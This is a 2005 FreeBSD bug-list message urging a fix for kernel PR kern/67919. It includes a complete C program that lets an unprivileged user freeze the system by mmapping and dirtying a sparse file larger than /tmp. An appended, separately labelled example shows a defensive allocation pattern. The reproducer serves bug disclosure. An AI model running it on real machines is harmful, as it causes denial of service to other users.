Date: Mon, 31 Oct 2005 07:20:13 GMT
From: "Cai, Quanqing" <caiquanqing@gmail.com>
To: freebsd-bugs@FreeBSD.org
Subject: Re: kern/67919: Why nobody take serious to fix this bug?
Message-ID: <200510310720.j9V7KDX9070428@freefall.freebsd.org>
The following reply was made to PR kern/67919; it has been noted by GNATS.

From: "Cai, Quanqing" <caiquanqing@gmail.com>
To: freebsd-current@freebsd.org, bug-followup@FreeBSD.org
Cc: Igor Sysoev <is@rambler-co.ru>, Edwin Groothuis <edwin@mavetju.org>, Uwe Doering <gemini@geminix.org>
Subject: Re: kern/67919: Why nobody take serious to fix this bug?
Date: Sun, 30 Oct 2005 21:28:22 -0800

Today I happened to read this message on freebsd-stable:
http://lists.freebsd.org/pipermail/freebsd-stable/2005-October/019086.html

After I read all the messages and related links, I feel so frustrated: why does nobody take fixing this bug seriously, even though we have a patch for it? I can repeat this bug on 7.0-CURRENT and 6.0-RC1 easily as a normal user! The system becomes unresponsive, so I have to power cycle it. The patch made by Uwe Doering actually works well. This bug looks like a security hole to me :( If you guys don't like this patch, please give a reason and come up with a better patch or solution.

For the impatient, you can run this to crash your system (7.x, 6.x, 5.x); you have to increase FILELEN to a size greater than your /tmp partition:

===============================================
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <err.h>
#include <sys/types.h>
#include <sys/mman.h>

#define FILENAME "/tmp/test" /* where to put the test file */
#define FILELEN 710 /* test file length in MB */

int
main(void)
{
    int fd;
    size_t len;
    char *buf, *p, *lim;

    len = FILELEN * 1024 * 1024;

    if ((fd = open(FILENAME, O_RDWR|O_CREAT|O_TRUNC, 0666)) == -1)
        err(2, "open() failed");

    /* extends the file to len bytes without writing any data */
    if (ftruncate(fd, len) == -1)
        err(2, "ftruncate() failed");

    buf = mmap(NULL, len, PROT_WRITE, MAP_SHARED, fd, 0);
    if (buf == MAP_FAILED)
        err(2, "mmap() failed");
    (void)close(fd);

    /* dirty one byte in every 4096-byte step of the mapping */
    for (p = buf, lim = p + len; p < lim; p += 4096)
        *p = '0';

    if (munmap(buf, len) == -1)
        err(2, "munmap() failed");

    exit(0);
}
===============================================================

Cai, Quanqing
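
The reproducer above maps a file that `ftruncate()` only extended, so nothing is reserved on disk before the pages are dirtied. As an added example (not part of the original message, and not Uwe Doering's patch), this is an application-side pattern that checks free space and reserves the blocks with `posix_fallocate()` before `mmap()`, so running out of space is reported as an error up front; `map_reserved`, `avail_bytes` and the `/tmp/reserved-demo.bin` path are names chosen here for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/statvfs.h>
#include <unistd.h>

/* Bytes an unprivileged process may still allocate on fd's filesystem. */
static uint64_t avail_bytes(int fd)
{
    struct statvfs sv;
    return fstatvfs(fd, &sv) == -1 ? 0 : (uint64_t)sv.f_bavail * sv.f_frsize;
}

/* Reserve len bytes for path, then map it; returns 0 or an errno value. */
int map_reserved(const char *path, size_t len, void **out)
{
    int rc, fd = open(path, O_RDWR | O_CREAT | O_TRUNC, 0600);
    if (fd == -1)
        return errno;
    if (len == 0)
        rc = EINVAL;
    else if ((uint64_t)len > avail_bytes(fd))
        rc = ENOSPC;            /* refuse before any data block is allocated */
    else
        rc = posix_fallocate(fd, 0, (off_t)len); /* returns an errno value */
    if (rc == 0) {
        *out = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
        if (*out == MAP_FAILED) {
            rc = errno;
            *out = NULL;
        }
    }
    (void)close(fd);
    if (rc != 0)
        (void)unlink(path);     /* leave no partial file behind */
    return rc;
}

int main(void)
{
    void *p = NULL;             /* constructed sample path and size */
    int rc = map_reserved("/tmp/reserved-demo.bin", (size_t)1 << 20, &p);
    printf("map_reserved returned %d\n", rc);
    if (rc == 0 && munmap(p, (size_t)1 << 20) == 0)
        (void)unlink("/tmp/reserved-demo.bin");
    return rc != 0;
}
```

The free-space check is advisory, since another process can consume the space in between; the `posix_fallocate()` return value is the authoritative one.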